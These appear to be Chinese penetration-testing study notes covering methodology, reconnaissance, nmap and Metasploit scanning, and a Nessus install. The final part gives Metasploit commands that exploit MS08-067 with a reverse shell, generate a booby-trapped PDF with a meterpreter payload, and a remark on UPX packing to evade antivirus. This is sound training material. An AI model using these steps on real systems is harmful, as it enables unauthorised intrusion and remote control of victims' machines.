pantester
渗透测试是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制错失,去的访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式
攻击前(网络踩点、网络扫描、网络查点)
攻击中(利用漏洞信息进行渗透攻击,获取权限)
攻击后(后渗透维持攻击,文件拷贝,木马植入,痕迹 擦除)
黑盒测试
对渗透攻击目标网络内部拓扑一无所知,完全模拟真实黑客有组织有步骤的渗透入侵过程
特点:花费时间长
渗透测试者需要有较高的技术能力
白盒测试
对渗透攻击目标网络非常了解,以最小的代价进行系统安全探测
特点:节省时间
无法有效测试客户的内部安全应急响应程序
灰盒测试
更深入全面
渗透流程
前期交互阶段(渗透测试范围、目标、限制条件、服务合同)(收集客户需求、准备测试计划、定义测试范围、定义业务目标)
情报搜集阶段(公开信息查询、google hacking、社会工程学、网络踩点、扫描检测、被动监听、服务查点)
威胁建模阶段(情报分析、攻击路径)
漏洞分析阶段(结合安全漏洞扫描结果和服务查点信息、针对关键系统服务进行漏洞挖掘)
渗透攻击阶段(利用目标漏洞,入侵系统,获得访问权限)
后渗透攻击阶段(根据目标业务经营情况,挖掘出最有价值的信息和资产)
报告阶段(想客户提高安全渗透报告)
漏洞分析与利用Exploit
安全漏洞生命周期
安全漏洞研究与挖掘
Exploit代码开发与测试
安全漏洞/Exploit代码限于封闭团队
安全漏洞/Exploit代码开始扩散
攻击工具/恶意程序出现并传播
Exploit/攻击工具/恶意程序大规模传播并危害互联网
Exploit/攻击工具/恶意程序逐渐消亡
安全漏洞公共资源库(CNNVD,CNVD,SCAP,CVE,NVD,SECURTYFOCUS,OSVDB,WOOYUN)
安全攻击流程
踩点,扫描,攻击,维持访问
基础入门
环境搭建
情报收集
web服务渗透
网络服务渗透
客户端渗透
社会工程学
移动环境渗透
强大的Meterpreter
信息收集
漏洞评定工具
攻击工具
用户提权
维护登陆
逆向工程
RFID工具
压力测试
取证
报告工具
服务
杂项
BT5:操作系统,包含各种各样不同作者编写的黑客攻击(安全审计)工具,从渗透前期到后期全部涉及
Metasploit:渗透攻击平台(软件套餐),包含整个渗透攻击流程的大部分工具,采用统一的攻击流程,攻击语法,模板化
渗透攻击模块、攻击载荷、辅助模块、后渗透攻击模块
模块--Metaspoit框架对外提供的最核心的渗透功能实现代码
插件--用于集成外部的安全攻击,例如Nessus(漏洞扫描器),Nmap(端口扫描器)
组成
Aux辅助:模块主要完成信息搜集
Exploits模块:进行渗透攻击
Post后渗透攻击模块:进行主机控制与拓展攻击
msfconsole接口 控制台终端
msfgui 图形化界面
msfcli 命令行程序
渗透测试前期
footprinting 网络踩点
网络踩点技术:DNS与IP查询、web信息搜索与挖掘、网络拓扑侦查
收集目标系统的域名、IP地址、拓扑、联系信息等外围信息
scanning 网络扫描
探测目标活跃主机(即IP)、端口信息(开放的服务)、系统类型和服务版本、相关的安全漏洞
enumeration 网络查点
对探测出来的服务进行进一步的攻击探测
DNS/IP踩点
whois域名注册信息查询
nslookup与dig域名查询
IP2Location地理位置查询
netcraft实现信息查询服务
IP2Domain反查域名
进入unity模式
whois 用来查询域名注册信息库的工具,如果开启域名信息保护,无法看到详细信息 查不到IP
nslookup 查询DNS服务器上的Cache非权威解答
set type=A
dig 可以指定具体的域名服务器,得到更权威的解析
dig @ns.watson.ibm.com testfire.net
IP2location 得到域名对应的IP信息,还可以得到具体的地理位置和其他私密信息
maxmind.com
netcraft实现信息查询服务
可以查询网站和服务器更详细的信息
查询域名相关的子域名
searchdns.netcraft.com
IP2Domain反查域名
可以查询哪些域名指向同一个IP地址
7c.com
搜索引擎踩点
Google Hacking技术
工具推荐
SiteDigger (http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx#)
search diggity
搜索网站的目录结构
parent directory site:testfire.net
检索特定类型的文件
site:testfire.net filetype:xls
搜索网站中的E-mail地址
use auxiliary/gather/search_email_collector
搜索易存在SQL注入点的页面
拓扑路径踩点
traceroute (用icmp来追踪)
tcptraceroute (利用SYN的同步位对每跳进行握手,可以穿透防火墙)
网络扫描描述
主机描述 找出网段内活跃主机
ICMP ping 对目标系统进行echo request 请求探测 最常规的ping工具,容易被防火墙屏蔽
-c 次数 -s 数据包大小
arpping 通过arp请求来实现探测,一般防火墙没法过滤arp协议
在arping的基础上,加入网段扫描支持,通过ifconfig命令查看接口信息,然后调用具体的网卡来执行arp扫描
arp-scan --interface=eth2 10.10.10.0/24
nbtscan 得到 IP,MAC,netbios主机名信息
nbtscan 10.10.10.0/24
Nmap 世界上最流行功能最强大的网络扫描工具
nmap -sn 10.10.10.0/24 扫描MAC,IP信息,不做端口扫描
nmap 扫描选项(用于指定扫描的方式) 扫描目标(用于指定IP地址)
主机发现模块 局域网内部ARP扫描器,只能扫描同一局域网内部主机 arp_sweep
msfconsole
use auxiliary/scanner/discover/arp_sweep
show options
set RHOSTS 10.10.10.0/24
set THREADS 10
run
back 退出
exit 回到根目录
端口扫描 找出主机上所开放的网络服务
Metaspolit端口扫描模块
通过tcp syn做端口扫描,速度较快且不易被发现,可以有其他选项
use auxiliary/scanner/portscan/syn
show options
set RHOSTS 10.10.10.129
set THREADS 20
run
Nmap实现端口、服务、系统检测
nmap -sS -Pn 10.10.10.129 通过ICP SYN方式扫描,并且扫描过程中不用进行ICMP echo探测,能扫描到IP、端口、服务信息、操作系统大概的类型
nmap -sV -Pn 10.10.10.129 在上面的基础上可得到更详细的软件服务版本信息 此系统提供服务对应的软件版本信息
nmap -sV 10.10.10.129 能扫描到IP、端口、服务信息、操作系统大概的类型,此系统提供服务对应的软件版本信息
nmap -A 10.10.10.129 能扫描到IP、端口、服务信息、操作系统类型,此系统提供服务对应的软件版本信息
操作系统/网络服务辨识 识别主机安装的操作系统类型与开放网络服务类型,以选择不同的渗透攻击代码及配置
xprobe2 10.10.10.129 根据不同协议的反馈协议,综合得出操作系统信息
nmap -O 10.10.10.129 除了得到操作系统信息,也能扫描到IP、MAC、PORT、服务信息,没法看到服务对应的软件版本
漏洞扫描 找出主机/网络服务上所存在的安全漏洞,作为破解通道
Nessus漏洞扫描器
安装方式
到Nessuss官网下载软件版本,根据BT5的版本下载
http://www.tenable.com/products/nessus/select-your-operating-system
Nessus-6.2.1-ubuntu910_i386.deb
将其复制到BT5桌面下(直接拖拽),进入路径并进行安装
cd Desktop/
dpkg -i Nessus-6.2.1-ubuntu910_i386.deb
到官网申请Nessus激活码
http://www.tenable.com/products/nessus-home
添加Nessus管理员用户名和密码
/opt/nessus/sbin/nessuscli adduser cisco
Login password:cisco
Login password(again):cisco
通过激活码激活Nessus,并且开始漏洞插件在线下载
/opt/nessus/sbin/nessuscli fetch --register D2E2-F637-F405-0210-3938
等待升级完成后
/opt/nessus/sbin/etc/init.d/nessusd restart
通过浏览器输入https://localhost:8834访问Nessus,输入帐号密码cisco/cisco,登陆
search ms08_067
show payloads
use exploit/windows/smb/ms08_067_netapi 查看此渗透模块所对应的攻击载荷
set PAYLOAD generic/shell_reverse_tcp
set RHOST 10.10.10.130 设置目标IP
set LHOST 10.10.10.128 设置本地IP
set LPORT 5000 设置本地端口,此端口为渗透后靶机回连端口
set TARGET 5 系统操作代码
show options
exploit
OpenVAS漏洞扫描器
use exploit/windows/fireformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 10.10.10.128
set LPORT 8443
set FILENAME 1.pdf
exploit
[*] Generated output file /root/.msf4/data/exploits/1.pdf
set LHOST 10.10.10.128
set LPORT 80
exploit
set LHOST 10.10.10.128
set LPORT 80
exploit
在靶机上安装杀毒软件,可以通过UPX来实现加强免杀